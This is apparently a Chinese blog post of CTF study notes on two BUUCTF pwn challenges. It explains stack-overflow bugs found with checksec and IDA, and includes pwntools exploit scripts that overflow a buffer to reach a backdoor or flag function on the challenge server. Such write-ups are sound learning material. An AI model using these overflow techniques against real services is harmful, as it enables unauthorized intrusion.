学习笔记:buuctf pwn题

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量456 收藏 2
点赞数
分类专栏: buuctf 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RookieMOR/article/details/125344362
版权

1.bjdctf_2020_babystack:

先checksec一下:

64位,打开了NX保护。再用ida打开:

 可以发现read函数,存在栈溢出。

f12,查看字符串:

发现/bin/sh,存在后门函数backdoor:

 

再找到backdoor的地址:

  

然后就是nbytes的大小,因为在read函数里面nbytes会发送强转,所以先输入一个‘-1’,然后nbytes在read函数里面会变为一个很大的数字。再用栈溢出,获得shell。

获得flag:

 

代码:

from pwn import*

io = remote('node4.buuoj.cn',25870)

payload = b"-1"

io.recvuntil(b"[+]Please input the length of your name:")
io.sendline(payload)

payload = b'a'*(0x10+8) + p64(0x4006e6)

io.recvuntil(b"[+]What's u name?")
io.sendline(payload)

io.interactive()

2.get_started_3dsctf_2016:

先checksec一下:

32位,打开NX保护,用ida打开:

 发现gets函数,大概率是溢出。

f12,发现有一个flag.txt,进入函数:

看大佬的wp,知道了一些简单方法。 

 法1:

因为可以直接发现flag的地址:

 可以直接用gets的溢出,绕过第一个if,直接得到flag。但是只能用本地打通。

法2:

可以构造payload = ‘a'*字符数 + ebp + flag开始地址 + flag结束地址 + a1的地址 + a2的地址,

这里flag的结束地址用exit的地址,确保有回显。

代码:

from pwn import*

io = remote('node4.buuoj.cn',29906)

#'a'*offset + 'ebp' + flag_get + fanhuiflag_get + canshu1 + canshu2
payload = b'a'*0x38
payload += p32(0x80489a0) + p32(0x804e6a0)
payload += p32(0x308CD64F) + p32(0x195719D1)

io.sendline(payload)

io.interactive()

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

RookieMOR
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF PWN-堆总结 2021-09-27
m0_56897090的博客
09-27 2014
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 1451
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 392
buuctf pwn 第三页
PWN学习记录(2)BUUCTF-rip
m0_58824086的博客
07-31 272
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。由**char s[15]**可得,在main函数的栈帧中,划分了一个15字节的存储空间,也就是说只需要存入15个字节地址,就可以get函数返回地址。可以发现,这是一个64位的ELF文件,可得每个存储单元是8个字节,即一个字节是8位,同理32位就是4个字节。dup():重复定义圆括号中指定的初值,次数由前面的数值决定。
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 867
这只是个人笔记buuctf的刷的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
PWN学习记录(1)BUUCTF-test_your_nc
m0_58824086的博客
07-29 674
搭好了PWN环境后,我计划做验证下搭的环境有没有问我选择刷BUUCTFPWN练习打开第一我就懵了零基础的我完全不知道这个是什么要干什么但看到那个下载test猜测那是目,下载下来后第一步就卡住了,不知道这个test文件怎么打开,以及这个目如何使用搭建的虚拟机来解答经过一番搜索,我决定先学习如何将下载的test文件导进虚拟机中。
buuctf-pwn write-ups (8)
CoLin的pwn小屋
07-03 245
buuctf-pwn 062~066题解
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 215
buuctf-pwn 067~072题解
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 385
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
browser_pwn:浏览器pwn,现在主要工作
03-22
V8_pwn: V8是Google Chrome浏览器内置的JavaScript引擎,负责快速、高效地执行JavaScript代码。V8_pwn专注于寻找和利用V8引擎中的安全漏洞。这些漏洞可能涉及内存管理错误(如堆溢出、栈溢出或类型混淆),或者是...
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
pwncollege:部署pwn.college
02-24
大学该存储库具有部署pwn.college实例所需的工件。设置docker build -t pwncollege_challenge containers/pwncollege_challengecp -r CTFd-pwn-college-plugin CTFd/CTFd/pluginsdocker-compose up -ddocker run --...
学习记录day18——数据结构 算法
weixin_64918301的博客
07-24 888
程序 = 数据结构 + 算法算法是程序设计的灵魂,结构式程序设计的肉体算法:计算机解决问的方法护额步骤。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 425
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 988
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
学习测试12-车(略)
qq_44897733的博客
07-25 262
系统讲解,可以在懂车帝网站去了解汽车结构
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值